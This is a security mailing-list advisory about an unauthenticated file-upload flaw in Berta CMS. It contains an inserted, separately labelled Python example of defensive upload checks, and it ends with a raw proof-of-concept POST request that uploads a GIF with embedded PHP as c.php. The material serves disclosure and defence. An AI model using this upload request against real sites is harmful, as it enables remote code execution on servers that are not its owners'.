List: full-disclosure
Subject: [FD] Insecure file upload in Berta CMS
From: Simon Waters <simon.waters () surevine ! com>
Date: 2015-03-26 18:01:09
Message-ID: F9EED012-4100-4170-8C48-FF3050869169 () surevine ! com
Berta CMS is a web based content management system using PHP and local file storage.
http://www.berta.me/
Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software.
We found that the file upload didn't require authentication.
Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions.
It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.
http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/
We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.
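The two weaknesses described above (an upload that needs no authentication, and an image check that only inspects the header) can be made concrete with a small defensive check. What follows is an added example, not code from this advisory or from Berta CMS: a GIF header check that establishes dimensions the same way getimagesize() does, a block walker that surfaces the comment extension where such a file can carry a PHP payload, and an upload check that rejects on authentication, extension, magic bytes and embedded PHP tags. The two GIF byte strings are constructed samples, not the payload from the request below; the function names are the example's own.

```python
"""Added example: why "it parses as an image" is not an upload filter.
A minimal GIF header check beside the checks a hardened upload handler
should actually make. Sample files below are constructed, not real uploads."""
import re
import secrets
import struct

PHP_PAYLOAD = b"<?php phpinfo(); ?>"  # constructed sample, same shape as the advisory's test

# Constructed 1x1 GIF: header, logical screen descriptor, image descriptor, LZW data, trailer.
CLEAN_GIF = (
    b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00\x00\x00"
    + b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"
    + b"\x02\x02\x44\x01\x00" + b"\x3b"
)
# Constructed 64x64 GIF with a comment extension (0x21 0xFE) carrying the PHP tag.
PHP_IN_COMMENT_GIF = (
    b"GIF89a" + struct.pack("<HH", 64, 64) + b"\x00\x00\x00"
    + b"\x21\xfe" + bytes([len(PHP_PAYLOAD)]) + PHP_PAYLOAD + b"\x00"
    + b"\x2c" + struct.pack("<HHHH", 0, 0, 64, 64) + b"\x00"
    + b"\x02\x02\x44\x01\x00" + b"\x3b"
)

def gif_dimensions(data):
    """Roughly what getimagesize() establishes for a GIF: magic bytes plus the
    logical screen size. Returns (width, height) or None. Note that it never
    looks past byte 10, which is exactly why it is not a content filter."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    return struct.unpack("<HH", data[6:10])

def gif_comments(data):
    """Walk the GIF block structure and return the comment-extension payloads."""
    if gif_dimensions(data) is None:
        return []
    packed, pos = data[10], 13
    if packed & 0x80:                         # global colour table present
        pos += 3 * (2 << (packed & 7))

    def sub_blocks(p):                        # length-prefixed blocks up to a 0x00 terminator
        out = b""
        while p < len(data) and data[p] != 0:
            n = data[p]
            out += data[p + 1:p + 1 + n]
            p += 1 + n
        return out, p + 1

    comments = []
    while pos < len(data):
        block = data[pos]
        if block == 0x3b:                     # trailer
            break
        if block == 0x21:                     # extension block
            label = data[pos + 1]
            body, pos = sub_blocks(pos + 2)
            if label == 0xfe:
                comments.append(body)
        elif block == 0x2c:                   # image descriptor
            lpacked = data[pos + 9]
            pos += 10
            if lpacked & 0x80:                # local colour table present
                pos += 3 * (2 << (lpacked & 7))
            pos += 1                          # LZW minimum code size
            _, pos = sub_blocks(pos)
        else:
            break                             # unknown block: stop walking
    return comments

# Extension allow-list paired with the magic bytes the content must start with.
MAGIC = {"gif": (b"GIF87a", b"GIF89a"), "png": (b"\x89PNG\r\n\x1a\n",),
         "jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",)}
# PHP open tags; the bare short tag "<?" is omitted to avoid flagging XML.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)|<script[^>]*\blanguage\s*=\s*['\"]?php", re.I)

def check_upload(filename, data, authenticated):
    """Return the list of reasons to reject the upload; an empty list means accept."""
    reasons = []
    if not authenticated:
        reasons.append("unauthenticated")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        reasons.append("extension not allowed")
    elif not data.startswith(MAGIC[ext]):
        reasons.append("content does not match extension")
    if PHP_TAG.search(data):                  # scan the whole body, not just the header
        reasons.append("embedded PHP tag")
    return reasons

def storage_name(ext):
    """Server-chosen filename: never reuse the client-supplied one."""
    return secrets.token_hex(16) + "." + ext

if __name__ == "__main__":
    print(gif_dimensions(PHP_IN_COMMENT_GIF), gif_comments(PHP_IN_COMMENT_GIF))
    print(check_upload("c.php", PHP_IN_COMMENT_GIF, authenticated=False))
```

The header check reports 64x64 for the file carrying the PHP tag, which is the point of the advisory: dimensions say nothing about what else the file contains. The reject list for the unauthenticated "c.php" upload shows that the released patch (authentication) and the extension allow-list would each have stopped it on their own; the tag scan is the extra check worth keeping for files that are then served from a directory where PHP executes.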
The author was notified: 2015-03-22
Author acknowledged: 2015-03-23
Patch released: 2015-03-26
The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires authentication to upload files.
This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).
The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.
POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
Content-Length: 1617
-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php
GIF89/* < ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF \
SmartSaver Ver1.1a , È < þ ÈI 8ëÍ ÿ`(Ždižh lë p,Ïtmßx ï|ïÿÀ p È \
r™$ö˜ 4ê Z Õ cËíz `n { „ 2-xLn ßé |Î` \
^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…"••‡‰‰"' _ 1˜ – ‚ ™s›& ^ŸŽ \
a ? g $ ] ž ÃÄ< Âw X \‘^ ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜ á)ÖßÙËâ \
Þèëì'äeç MÌJ êíøùö x{{ üý P€‚64 ðVpÃ@> 8PƒÄ3 R pOŸÇ þ ÞU8˜!@˜ \
(SbL9 a "š6Z8 É 03 ) #ÈŸøD Œ÷òä I qY RN›D $ Æ€ O XÅ p Qd‹ P s \
c˜ &'y5 Ûi[ÓF ð ‹R~ ÄŽ%Û4 Z { Ðö a[q ΕP—Ë]Yy o™„mc/*ål,| 3 \
Ä )\fðX˜d.L+Ç"à Àh 8{žM ôb×'‡‚**GãEŒ Tï>Ø gnãÉh+/d{ …у \
FU;ñ9ë ‰Xv} A/ Ø —‹ Ôü u0Ñå:g Ãëô xv-À'å Çë'R ˜Wô ™þ' f \
XCÅuýÜÆ ~áíç ý âÞqê xÐ7Þ}ÑP{ ç Ö„Ô ƒ$ / (Ýz zQÜLááÕ € \
ý6‡ˆÉ• c ':"â é) w Ý < H A5å‚ $;FÉ ŒJúw Z ž -ƒ$ Iõ "Ob#å™8ô \
Í ˜e)a™vu@ä— „6f"p æž5 ‰Ð XVù&r v 3jy'ž„šÉç /øY …B
h œ^ž f<‹'FP‹(n % )›q
*{\j0 už *f; ê Ž– Ú kÒ `ž‚
k oZÓ þæ ë ôzå j9ë / 9*/<?php phpinfo(); ?>/*
`ÇŽ Ì U . áBkî>#VëE' î • j v í åœë/ ‹ Æ;h 6 D ` \
k0 Ç H ÿú› ÃòN n Äñf/ a÷ ÀkFÜ ‡ WlîÅÊÊ4f c Q s 6 ˆz Ê1/RÇ \
Ê@Wpñ ™É & Ç]Aæ|ïš ñ n O ôÕ o+îi! !""ÓÀ"4õ —2Ö ^ \
óX0wÊ Z™ F6É rÝuÖV Û Ò óÔzâ Hqw?|k ‚ÿìwÅnóýUÆ'k øá‡e |ùŸ• \
7šã [L%G‚ãA á}‹–Ku™7 éza q- k‡Žfä ŽÔé $nç Àk v 'o \
D(åá < éQ€ ` ` q}FÙ*ïý÷ ‡/þøä—oþùè þúì \
ïþûðÇ/ÿüô×oÿýøç ÿþü÷ïÿÿ ;
-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"
Upload Image
-----------------------------2147563051636691175750543802--
Simon Waters
phone +448454681066
email simon.waters@surevine.com
skype simon.waters.surevine
Participate | Collaborate | Innovate
Surevine Limited
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/